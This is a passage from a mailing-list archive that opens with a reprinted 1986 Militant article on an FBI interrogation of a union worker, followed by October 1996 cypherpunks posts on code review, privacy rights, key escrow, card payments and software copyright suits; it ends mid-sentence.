   The article below is reprinted without changes from the 
May 16, 1986, Militant. It appeared in that issue with the same 
headline and accompanying graphic. It is relevant to efforts by 
opponents of U.S. policy toward Cuba today to protest 
harassment by federal agents and defend democratic rights. 
Author Jeff Jones is now a member of the International 
Association of Machinists in Minneapolis. Sam Manuel is a 
member of the United Transportation Union in Washington, D.C.


BY JEFF JONES 
AND SAM MANUEL
   SAN JOSE - Last November Don Bechler was hauled in by plant 
security at Westinghouse to face interrogation by an FBI agent. 
The agent said he was being investigated for in-plant 
"sabotage." He was grilled for 40 minutes without a lawyer 
present, which is his legal right. He also did not have his 
shop steward with him.
   Bechler is active in the anti-apartheid movement and the 
fight against U.S. intervention in Central America. He is also 
a union activist and a member of the Socialist Workers Party.
   This questioning by the FBI was not only a violation of 
Bechler's democratic fights, but the rights of everyone who has 
a dissenting point of view, as well as an attack on the union. 
Charges of "sabotage" against workers in plants that make 
military hardware are part of the employers' and government's 
sustained offensive against democratic fights. This is why it 
is useful to look at what happened at Westinghouse and the 
lessons of that experience.
   Westinghouse is a major producer of military hardware. The 
plant is in Sunnyvale, California. The production workers are 
represented by International Association of Machinists Local 
565. Bechler is a bench grinder.
   The FBI agent had Bechler's personal notebook, which Bechler 
thought he had lost. The agent said that plant security had 
given it to him.
   After Bechler agreed to talk with the FBI, the agent asked a 
number of questions about the notebook. It had notes about 
work, shopping lists, and information on various political 
activities Bechler is involved in.
   The FBI agent told Bechler that he thought potential 
saboteurs in the plant included unionists who opposed 
concessions to the company in the recent contract negotiations. 
Some workers may have been frustrated that there wasn't a 
strike, the agent said, and therefore decided to commit 
sabotage.
   After the grilling, the FBI agent refused to return 
Bechler's notebook - implying that he remained under 
investigation. At a union meeting 11 days later, it was 
reported that another worker had been subjected to a similar 
interrogation by the FBI. Union leaders stressed that members 
should always demand a shop steward when meeting with the 
company.
   Under pressure from the union, the FBI has since returned 
Bechler's notebook.
   This harassment by the FBI represents a serious attack on 
the democratic rights of Bechler, the union, and all working 
people. The FBI has no legal right to walk into a plant, roam 
around, and begin interrogating workers. And workers, as well 
as others, are under no legal obligation to voluntarily submit 
to such questioning.
   The FBI, like all other cop agencies in this country, serves 
and protects big business and its government. When they enter 
Westinghouse or other plants it is on the side of the company.
   This attack on democratic rights occurs in the context of 
the employers' antilabor offensive and drive toward war in 
Central America. Such assaults go hand in hand.
   As the government gears up for war abroad, it must erode 
democratic rights at home. The aim is to get workers to accept 
as normal such things as growing restrictions on security 
clearances, denying the rights of accused persons to be 
released on bail, having more cops in the plants questioning 
workers, and developing an atmosphere of suspicion against 
workers who buy socialist publications or travel to Nicaragua.
   It is part of the government's concerted effort to change 
workers' perception of what's "normal." Each blow to democratic 
rights weakens the ability of the labor movement to defend 
itself against austerity and fight U.S. intervention abroad.
   In the last period the government has concocted a series of 
highly publicized trials of accused "spies" - the greatest 
number of espionage cases at any one time in the history of the 
country.
   These "spy" trials and charges of industrial sabotage are 
aimed at dividing and intimidating workers. While initial 
targets tend to be politically active workers, the ultimate 
victims are all workers and working farmers. The aim is to 
sharply limit democratic rights and limit political discussion 
and debate in order to dragoon workers into war.
   One aspect of the employers' anti-democratic drive is 
seeking to establish the "right" of the FBI and other cop 
agencies to enter workplaces and interrogate workers. Among the 
ways in which the FBI and cops justify their intrusion is the 
alleged need to defend "national security" by stopping 
"saboteurs" and cracking down on "drug use."
   By agreeing to talk to an agent, a worker falls into the 
trap that has been set: the act of talking itself is a form of 
collaboration with the agent. This is true regardless of 
whether a shop steward is present or not. Although Bechler 
denied the charges of sabotage, the fact that he talked to the 
agent had already caused damage to workers' rights. The content 
of what a worker says in such a situation is not the key 
problem. The agreement to cooperate - talk - when not legally 
compelled to, means the cops scored a victory.
   The goal of the FBI in these circumstances is not to get a 
worker to say something "damaging" - that's just a bonus for 
them when that happens - but to get the worker to accept and 
help establish their "right" to engage in such interrogations. 
This reinforces the lie that cops stand above struggles between 
workers and bosses and in that sense are neutral. It helps 
reinforce one of the most elementary forms of class 
collaboration: actions based on the illusion that the cops are 
neutral, that they are simply enforcing the law without fear or 
favor.
   Moreover, it breaks down trust between workers. A precedent 
is set that it is okay to talk to the FBI and their finks when 
instead workers should have nothing to do with them.
   Bechler had no legal obligation to talk to the FBI. He in 
essence gave up his, rights by doing so. And, whatever he did 
say is now potential material to be used against him, the 
union, and others regardless of his intentions. There is no 
such thing as an off-the-record talk with cops.
   Under the Constitution and Bill of Rights, no one is ever 
obligated to voluntarily speak to a cop - FBI, CIA, 
immigration, city, state, customs.
   The accompanying reprint of a 1950s statement issued by the 
National Emergency Civil Liberties Committee explains one's 
rights in relation to the FBI: "The FBI, unlike courts and 
grand juries, does not have the power of subpoena of compulsory 
examination. You may decline an invitation to visit FBI agents 
or to receive them in your home or office.... The use of 
investigative power by governmental agencies to intimidate or 
threaten is expressly forbidden by law."
   In other words, one is never legally obligated to 
voluntarily engage in conversation with the FBI and other cop 
bodies.
   Looking back on what happened to him and the union, Bechler 
commented: "Once I started talking to them, they had me. I let 
them establish their `right' to even hold such conversations.
   "The fact that the union stood up for me and forced the FBI 
to return my notebook was a victory. It showed that it is 
possible to resist FBI violations of democratic rights.
   "The basic lesson to draw from this experience, however, is: 
never, under any circumstance voluntarily talk to the FBI or 
any other cop."

   Jeff Jones is a member of International Association of 
Machinists Local 565. Sam Manuel is the organizer of the San 
Francisco branch of the Socialist Workers Party.


To get an introductory 12-week subscription to the Militant 
in the U.S., send $10 US to: The Militant, 410 West Street, 
New York, NY 10014.
For subscription rates to other countries, send e-mail to 
themilitant@igc.apc.org or write to the above address.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 11 Oct 1996 07:51:05 -0700 (PDT)
To: raph@cs.berkeley.edu (Raph Levien)
Subject: Re: pgp, edi, s/mime
In-Reply-To: <325D21FD.75BFB75B@cs.berkeley.edu>
Message-ID: <199610111552.KAA15601@homeport.org>
MIME-Version: 1.0
Content-Type: text


Raph Levien wrote:

| But how can you be sure that _any_ software does what it's supposed to
| do? As someone (I don't remember who) pointed out a few days ago,
| Kerberos 4 was available in source form for a long time, and it had a
| really weak PRNG.
| 
| How many people have really looked critically at the PGP 2.6.2 sources?
| The key management code, in particular, is pretty bad. I didn't find any
| actual bugs (I wasn't looking for them - I was just trying to understand
| how it worked), but it didn't leave me with much confidence that it's
| completely robust code.

	I've been doing a lot of work recently for an organization
that does a lot of code reviewing.  The technique, while very useful
(we find security & reliability bugs at about one per 20-50 lines of
code, which is dropping to closer to one per hundred as I distribute
copies of code review guidelines I wrote. (available for comment at
www.homeport.org/~adam/review.html)

	However, reviewing superficially takes about an hour for
500-1000 lines of commented code.  A deep review to find tricky
problems can take much longer.  (I would expect that a review that
moved at 600 lines/hour would have missed the xor bug in PGP's key
generation code in 2.6.0)

	We've found that a review team of fewer than 4 people is less
effective at finding problems, and haven't had more than about 8 in a
review, so I can't offer an upper bound.  Reviewing more than about
2000 lines of code (2-3 hours) in a day burns me out.

	SSH has 16 000 lines of code.  PGP has about 30k, not
including RSAref.

	Incidentally, if someone wants to contract to review ssh, I'd
be interested in talking to you.


| At least with products like Netscape, money is being spent on quality
| assurance.

	QA does not always assure security.  You need a team dedicated
to security QA, although getting code thats been worked over for
reliability is always a win.

| You've raised a good question here. It's just that there are no easy
| answers.

Yep.  I figured I'd share my real world experience in getting secure
code deployed.

Adam

-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 11 Oct 1996 11:10:12 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <yqXmVD1w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961011110106.24451B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 11 Oct 1996, Dimitri wrote:

> "Z.B." <zachb@netcom.com> writes:
> 
> > Somehow I don't think that would be appropriate for a Cypherpunks 
> > meeting.  (Not to mention the fact that it has no crypto-relevance :).  
> 
> No deal, then...

MY invitation to Dimitri has NO topic limitations, Zach's 
suggestion to the contrary notwithstanding.  Do I take it, 
Dimitri, we have a tentative agreement for you to come and speak
at an SF area Cypherpunks meeting at our expense?  You are so
vocal usually.  Why will you not respond to my invitation?  I
consider this rude even by Russian standards.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 11 Oct 1996 11:08:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: "Right to Privacy" and Crypto
In-Reply-To: <3.0b19.32.19961011111653.008d4a04@panix.com>
Message-ID: <v03007802ae84487929df@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:19 AM -0400 10/11/96, Duncan Frissell wrote:
>At 06:17 AM 10/11/96 -0700, Declan McCullagh wrote:
>>
>>Yep, seems right to me. While I share some part of your position on the
>>undesirability of wiretapping, Uni's remarks about it being "firmly
>>entrenched" in the minds of L.E. and Capitol Hill are quite on-target.
>>
>>Few here in DC believe in an absolute right to privacy.
>
>In actual fact, most public officials profess (if not practice) a belief in
>an 'absolute right to privacy.'  That is, they profess opposition to
>torture.  They believe that coercion for testimony should be limited to two
>years imprisonment (or less).  There is no *official* pro-torture lobby in
>America (though in practice torture does occur).
>
>We've already established that they believe in an absolute right to
>privacy, we're just arguing over how far beyond the brain that extends.
>And since we control our brains and we control our i/o we can probably
>expand that zone of privacy in practice.

I believe any arguments based on a "right to privacy" are shaky. One will
find no such right clearly enumerated in the Constitution, though various
things seem to implicity reference such a right ("secure in one's papers,"
"quartering troops," and the various First Amendment issues).

Judge Bork--whatever you may think of him--was probably correct in pointing
out that there just is no specific "right to privacy," at least insofar as
protecting one against various laws. (To wit, one argument for abortion
rights was a "right to privacy"--Bork believed this to be ungrounded in
actual Constitutional law...and it's pretty clear that one cannot, say, use
illegal drugs on the grounds that there's a "right to privacy.")

I'm of course just a layman, not a law professor or scholar. But I feel it
best that we not invoke a "right to privacy" to protect our crypto
abilities, when such a "right" apparently does not exist.

However, certain things which _look_ like a "right to privacy" do exist:

* the aforementioned Fourth Amendment freedom from unlawful searches and
seizures, requirements for warrants, and "secure in one's papers." This
would pretty much preclude a requirement, for example, that all houses have
curtains removed (or removable by police surveillance teams) so as to
"monitor" what is going on inside houses.

(I've been using the analogy of Clipper and key escrow to window curtains
that can be made transparent when the government wants them to be
transparent, and probably without the residents even knowing that the
"transparency mode" has been remotely enabled. Ordinary people, like my
family members, immediately understand this and are shocked. I then
elaborate that it's as if the government could secrety gain access to
diaries, letters, television habits, etc. without the occupant of a house
even knowing it. This usually sours them on the USG rhetoric about the need
to fight crime with key escrow tools.)

* the freedom to speak as one wishes without government permission or
sanction, save in limited situations covered by specific laws (a big
loophole, I grant you) says to me that I can converse in Ubangi, in Hindi,
in Pig Latin, in RC4, or in Tim's Secret Language without anybody in
government telling me I must converse in a language _they_ can understand.

(The loopholes are for the usual things: espionage, sedition, suborning
perjury, extortion, and various other litigatable examples. A well-trodden
area of discussion on this and other lists. But in none of these examples
is there support for a government ability to tell citizen-units they may
not use the language of their choice in communicating with others, in
writing diaries for their own use, etc. (The "English-only" laws have to do
with communicating with authorities, tax agencies, schools, etc. I'm not
saying I support them, but they don't affect Alice and Bob communicating in
Urdu or Prakelitine.))

* The "freedom of association" provisions also provide a kind of support
for a generalized "right to privacy."

I think Ronald Dworkin's new book on law has discussions of this "right to
privacy" issue. I plan to read it soon.

Using this "right to privacy" line of reasoning must be done very carefully.

I would rather use First Amendment arguments if the USG tries to tell me
that I may only write my diaries in a key escrow language form, or tries to
tell Alice and Bob that they may only use a specified form of communication
between themselves. "Crypto as speech" seems well on its way toward being
established (e.g., Judge Patel's ruling, and the Supremes should get the
case one of these years).

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 11 Oct 1996 08:16:21 -0700 (PDT)
To: Declan McCullagh <declan@eff.org>
Subject: RE: legality of wiretapping: a "key" distinction
Message-ID: <3.0b19.32.19961011111653.008d4a04@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:17 AM 10/11/96 -0700, Declan McCullagh wrote:
>
>Yep, seems right to me. While I share some part of your position on the 
>undesirability of wiretapping, Uni's remarks about it being "firmly 
>entrenched" in the minds of L.E. and Capitol Hill are quite on-target.
>
>Few here in DC believe in an absolute right to privacy.

In actual fact, most public officials profess (if not practice) a belief in
an 'absolute right to privacy.'  That is, they profess opposition to
torture.  They believe that coercion for testimony should be limited to two
years imprisonment (or less).  There is no *official* pro-torture lobby in
America (though in practice torture does occur).  

We've already established that they believe in an absolute right to
privacy, we're just arguing over how far beyond the brain that extends.
And since we control our brains and we control our i/o we can probably
expand that zone of privacy in practice.

My "Brain Tennis with Dorothy" post of a few weeks ago expands on this
argument. 

DCF  

"You don't have to be nice to nation states you meet on the way up if
you're not coming back down."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Fri, 11 Oct 1996 21:21:31 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: RE: "Internet II" and Clinton
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961011182303Z-43260@mail4.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Timothy C. May

* a government attempt to reassert some sort of control over the
Internet,
a la the "we paid for the Arpanet, so we can control what it's used
for."
................................................................


That's also what I've been thinking about, regarding the efforts to get
all the schools wired.   "It's our project and we can control it if we
want to."   I could almost paranoically get cause & effect confused,
thinking that the program for free internet access is merely an excuse
for assuming the control over the internet that the governors are
aspiring to achieve, rather than it being merely a contingent
consequence of their involvement with it.    

I deplore the fact that so many people are lured into signing up for
internet access ( Hurry, Hurry, you don't know what you're missing on
Usenet!!!) without being mentally prepared for what they can expect to
see there.   Then they must suffer the shock of realization of what is
available, free & uninhibited.   (Ooops.   "They didn't tell us about
*that* stuff being there, (whine) take it way!")   

But you just have to know that, once the governors decide to become the
Determining Factor in setting up everyone for internet access, they will
also become the determining factor in what everyone gets to see, and
therefore gets to post or send through the channels.

   ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 11 Oct 1996 11:06:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
In-Reply-To: <v02130500ae8335a7be9d@[10.0.2.15]>
Message-ID: <TZ5mVD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


azur@netcom.com (Steve Schear) writes:

> >A clarification regarding something I wrote a few days ago:
> >
> >dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) writes:
> >> Another possibility is to issue a charge card (payable in full at the end 
> >> the month, getting revenue from the annual fee), rather than a credit card
> >> it could claim not to be subject to certain Federal Reserve's regulations 
> >> have to do with credit card disputes. But then it probably can't be Visa/M
> >> can't use their clearginhouses.
> >
> >A charge card (like the original AmEx, not like Optima) is not the same as
> >a debit card. I have a debit card, tied to my checking account, and using
> >mastercard's clearinghouse. To issue a debit card, the organization needs
> >to keep checking accounts. Even if it doesn't pay interest, doesn't make
> >commercial loans, etc, it still would be subject to weird Fed regulations
> >and probably couldn't maintain anonimity.
> >
> >But the lack of a dispite resolution mechanism is really the killer.
> >
> 
> How about companies that issue credit cards, but don't extend credit?  The
> kind customers must maintain a postive balance at all times in order to
> charge against their account.
"Extending credit" refers to the customer's ability not to pay the bill
in full at the end of the cycle, but effectively to borrow money from 
the issuer at a very high rate. Smart people don't use this feature of
their credit cards and pay off in full every month. :-)

Every secured credit card I've ever seen is still a credit card - the
holder maintains an account with a balance equal to his credit limit.
if he defaults on the cc payments, the issuer just takes the money
from the account, so it's a kind of a collateral.

But you don't have to pay in full at the end of the month (or have the
amount deducted from your account at once), which would make it a
charge card or a debit card.

One large card-issuing bank was in the news their other day: they're
using supercomputers for "data mining", analysing the purchases made 
with their creditr cards. Buyer beware.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Chiu <erchiu@cisco.com>
Date: Fri, 11 Oct 1996 13:53:41 -0700 (PDT)
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: BAY AREA CYPHERPUNKS SATURDAY 10/12 TRESSIDER HALL STANFORD
Message-ID: <2.2.32.19961011185443.006efc84@diablo.cisco.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:06 AM 10/11/96 -0700, you wrote:
>There will be a San Francisco Bay Area Cypherpunks meeting on Saturday 10/12 
>at Stanford University.  The meeting location will be the tables outside
>Tressider Hall, where we've met for several previous meetings.
>The canonical time is noon for lunch and milling around, and 1pm
>for organized program.

Bill -

What time is the meeting?
Eric Chiu
IS-Finance and Adminstration 
Tel:   408-527-1665
Pager: 415-424-7282





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 11 Oct 1996 08:59:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: EUB Caution
Message-ID: <1.5.4.16.19961011155740.0c172efe@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The Times [Of London] October 11, 1996


Investors cautioned over bank on Internet 

By Robert Miller 


The Bank of England has issued a blunt warning to UK investors 
to "think carefully" before handing over their money to an 
offshore bank that is advertising for depositors on the Internet. 


European Union Bank (EUB) is a tiny institution backed by 
American investors and based in Antigua. Until last month it 
was chaired by Lord Mancroft, 39, an Old Etonian. Lord Mancroft, 
who confirmed that he had met Michael Foot, the Bank's director 
of supervision, yesterday about EUB, said: "I understand their 
concerns." He added that his contract as chairman of EUB had 
expired last month. 


The sharp warning to UK investors from one of the Bank's most 
senior directors reflects the concerns of City watchdogs about 
the possible proliferation of financial services being offered 
on the Internet and which fall outside their regulatory scope. 
If any such firm failed investors would not be covered by the 
UK compensation schemes. 


The Bank said of EUB: "This bank is not authorised in the UK 
and has not sought authorisation. As with other offshore 
deposits we would advise intending depositors to carry out 
appropriate due diligence." 


[End]










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 11 Oct 1996 09:02:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Clinternet?
Message-ID: <v03007818ae841f37f6e6@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


Hoo boy.

I had the most amazing whiff of paranoia from the morning news.

Clinton wants to buy the internet back for $500 million so he can watch us
better?

Nawwww, 'course not...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 11 Oct 1996 13:52:45 -0700 (PDT)
To: Adam Back <everheul@NGI.NL
Subject: Re: AW: Binding cryptography - a fraud-detectible alternative to key-esc
Message-ID: <199610111917.MAA01715@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:08 PM 10/11/96 +0100, Adam Back wrote:

>As your paper describes, your system allows anyone to check the
>correctness of the escrowed session key.  Have you considered
>modifying it so that the only person who can check is the owner of a
>designated private key of a public/private key pair?  This would allow
>say for the TTP to check correctness, and not the TRP, nor the public.
>I'm not sure of the usefulness of this, but it allows you to select
>from the full spectrum according to requirements:
>
>a) no one can check, PGP second recipient (Carl Ellison, Bill Stewart)
>b) recipient only can check (my suggestion)
>c) holder(s) of designated keys can check
>d) anyone can check (your proposal)

I think the biggest problem with allowing "anyone" to check the correctness 
of a key is that what is a technical possibility today, will become a 
legally-mandated requirement tomorrow.  What if Internet backbone companies 
and/or ISP's were told that they had to implement software check these keys, 
and if they discovered an "incorrect" escrowed key, they were legally 
obligated to either refuse to forward that message, and/or forward a copy of 
that message to someone like Spooks@NSA.gov or Thugs@DOJ.gov.    

Even worse, if this checking process revealed the sender, or at least a 
coded identity unique to the sender, the government could issue "digital 
APB's" where it would insist on being sent copies of all messages with a 
given ID number.  Suddenly, the Internet might go from being hard to tap, to 
being practically automatically tapped.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Fri, 11 Oct 1996 13:46:19 -0700 (PDT)
To: letters@nytimes.com
Subject: Re: Clinton's Encryption Plan Fits Law and Market
Message-ID: <325EA1F9.41C67EA6@chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


Two serious flaws in this letter ...

1.  Secretary of Commerce, Mickey Kantor said:

> You assume that foreign buyers would not buy key-recovery products,
> but you ignore the trend -- especially in Europe -- to require use
> of key-recovery products and bar the import of stronger and stronger
> encryption products that do not take law enforcement into account.

A.  This is an old argument constantly rehashed by the government.
    What it convenient ignores is that no one OUTSIDE the government
    wants what the government schemes.  No one wants the government to
    mandate key recovery.  Some important uses of encryption, such as
    secure telephone conversations, simply do NOT need key recovery for
    ANY reason other than law enforcement intercepts.

B.  The point on other nations barring imports is absurd.  Since WHEN do
    we tailor our export limits to the import limits of OTHER nations?

C.  The so-called "trend" he refers to is ARTIFICIALLY created by the
    U.S. government through secret lobbying efforts, the most recent at
    the OECD in Paris.  The administration uses the word "trend" as if
    other nations are independently pursuing the key-escrow/key-recovery
    path, when in fact, only a few nations are considering such a move.
    Other nations, such as Japan, have openly opposed such a direction,
    and some nations, such as Sweden, have done so secretly because such
    a policy could not possibliy withstand the scrutiny of democratic
    processes.

2.  Kantor said:

> The National Research Council did not say that we should allow the
> export of all encryption.

Again, more mincing of words.  The administration, seeing that the NRC
report was staunchly against key escrow and government-mandated schemes,
chooses to ignore parts of the report it feels is convenient.

The NRC report, in fact, said that the government should immediately
relax all symmetric encryption up to 56-bits and all public domain
encryption UNCONDITIONALLY.  It did not say anything about signing a
pledge to develope key escrow or key recovery.  This condition invented
by the administration is nothing short of blackmail:  "play it our way,
or you have no chance to compete globally".



In short, Kantor's letter is yet more blatant lies and deception on the
part of the administration to get what it wants for law enforcement and
national security agencies without any concern for the nature of the 
technology nor the economic impact such policies will have.

-- 
Ernest Hua, Software Sanitation Engineer
Chromatic Research, 615 Tasman Drive, Sunnyvale, CA 94089-1707
Phone: 408 752-9375, Fax: 408 752-9301, E-Mail: hua@chromatic.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 11 Oct 1996 10:00:01 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks)
Subject: SPA Press Release on ISP suits (fwd)
Message-ID: <199610111700.NAA22251@nrk.com>
MIME-Version: 1.0
Content-Type: text


Michael Dodson sez:
In CYBERIA-L@LISTSERV.AOL.COM

The formatting may be a bit rough.  I am not a pro at this.


FOR IMMEDIATE RELEASE  ((edited))

Contact: David Phelps, (202) 452-1600, ext. 320, dphelps@spa.org

SPA Files Copyright Suits Against ISPs and End Users

Internet Anti-Piracy Campaign Launched

(Oct.10, 1996 --Washington, D.C.) -- The Software Publishers Association
(SPA) announced today that it has filed five civil lawsuits for copyright
infringement occurring on the Internet. Three of the lawsuits were filed
against Internet service providers (ISPs), and the remaining two were filed
against individual end users. Additionally, SPA launched its Internet
Anti-Piracy Campaign, which includes education and enforcement components,
in an effort to educate and work cooperatively with ISPs regarding
copyright infringement.

ISP lawsuits were filed on Oct. 7 and 8 against Community ConneXion of
................................................^^^^^^^^^^^^^^^^^^^
Oakland, Calif.; GeoCities of Beverly Hills, Calif.; and Tripod Inc. of
Williamstown, Mass. The SPA members named as plaintiffs in all three suits
were Adobe Systems Inc., Claris Corp. and Traveling Software Inc. In each
case, SPA first contacted the ISP and requested that the infringing
material be removed, but the ISP failed to respond and cooperate.
{.....}
((end of edited release))

See http://www.computerworld.com/news/news_articles/961010spa.html
for early reactions.


Michael Dodson
dodsonm@wane-leon-mail.scri.fsu.edu


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 11 Oct 1996 05:58:49 -0700 (PDT)
To: everheul@NGI.NL
Subject: Re: AW: Binding cryptography - a fraud-detectible alternative to key-esc
In-Reply-To: <01BBB6C9.D8205560@port10.ztm.pstn.rijnhaave.net>
Message-ID: <199610111208.NAA00407@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Eric Verheul <everheul@NGI.NL> writes on cpunks:
> Adam Back <aba@dcs.ex.ac.uk> writes:
> >[...]Also
> >the proposal (and other proposals which escrow session keys) doesn't
> >really provide any guarantees of protection from LE abuse, as such,
> >because they can decrypt all of the escrowed session keys with their
> >own private key
>
> No. In the scheme Law Enforcement (that is your LE, right?) agencies
> are never handed over the private keys of Trusted Retrieval Parties
> (TRPs), only the session keys.

My assumption was that a TRP is a government front.  (All of the
proposed clipper I escrow agents have been major US defense
contractors/government agencies, in addition the clipper I documents
hinted that the NSA would have a complete copy of the key database, in
any case).  I also fear that the government set regulations covering
TRPs would not be balanced in the favour of the public.  Your paper
did discuss this in the context of governments.  The US government is
the government which has explored key escrow the furthest, and this is
really why people are discussing your TTPs and TRPs in this context.

> So for each sessionkey LEs will have to go to a TRP. 

This much is the same as clipper I, just the parties have been renamed
(TRP = split escrow key database holders, TTP = US government).  The
novel part of your paper to me is your technical proposal to prevent
Blaze style spoofing of escrowed session keys.  Clipper I could have
prevented Blaze, if they had used a larger cryptographic checksum
(only 16 bits were used) to verify conformance.  However they were
relying on tamper proof hardware, your protocol works for software.

As your paper describes, your system allows anyone to check the
correctness of the escrowed session key.  Have you considered
modifying it so that the only person who can check is the owner of a
designated private key of a public/private key pair?  This would allow
say for the TTP to check correctness, and not the TRP, nor the public.
I'm not sure of the usefulness of this, but it allows you to select
from the full spectrum according to requirements:

a) no one can check, PGP second recipient (Carl Ellison, Bill Stewart)
b) recipient only can check (my suggestion)
c) holder(s) of designated keys can check
d) anyone can check (your proposal)

c) should be easy to acheive: restrict d) by having the sender encrypt
the escrowed session key a second time to this public key.

Something technical related to this discussion is the idea of using
forward secret protocols for email.  This goes even further away from
allowing others access to your data, and is another option to add to
list above, probably before a).  

The current situation is that with PGP at least, the recipient can be
coerced by governments (TTPs) into decrypting the email, if he still
has the private key, as PGP keys are commonly long term having the key
is likely.  In this sense you are `escrowing' the messge with the
recipient.

Using Diffie-Hellman (or a less interactive Diffie-Hellman, by using
hashes of the original Diffie-Hellman session key for subsequent
emails, an improvement over my original proposal for a non interactive
forward secrecy protocol suggested by Hal Finney) ensures that neither
you nor the recipient can be made to decrypt a wire-tapped message
unless they take specific actions to ensure this possibility.

This also allows finer control, as almost nothing is provided in terms
of recovery, and any message recovery for other parties or for
yourself can be added as required.  I would suggest adding any
recovery by archiving the data locally with encryption keys according
to the users backup, or recovery requirements.  This way any
wire-tappers get to come and ask for the data, and then ask for the
keys (neither of which the private user has any obligation to keep,
some businesses may have different legal obligations, contractual
agreements or recovery requirements, and they are free to archive this
accordingly, including taking wire-tap enabling steps such as
escrowing session keys with the message, if they wish).

> Moreover, the choice of TRPs should be large, so the idea is that
> you can always pick one you trust. Or set up your own, for that
> matter...

OK, now if this was the case, that allowing others access to your keys
is strongly voluntary, and that you can select from key holders, and
the TRPs have no externally imposed regulation I don't have a problem.

The reason cypherpunks get touchy about `key escrow' is that we now
know that, at least in the case of the US, the intention all along was
for eventual outlawing of non-escrowed crypto.  FOIA documents
obtained by the EFF indicated that this was the plan all along.  More
recently FBI director Freeh has been quoted as saying something like
`If [clipper variants] are not succesful at catching criminals we will
consider outlawing non-escrowed crytpo'.  (This is just so bogus --
any criminal would be a complete fool to use the escrowed crypto, so
the `are not succesful at catching criminals' is almost guaranteed to
come true.  Further, even if they _do_ outlaw non-escrowed crypto,
criminals won't be using it.)  The current angle the USG plans with
the clipper variants, is to achieve as much as possible in the
direction of outlawing non-escrowed crypto by coercing companies to
sell only escrowed crypto, and so acheive their aims by de facto
standard.

> In your suggestion checking can only be done with secret information
> (you need the secret key of the primary recipient).

I saw this as an advantage, politically I view it as preferable that
the only person who needs to know whether you are talking `on the
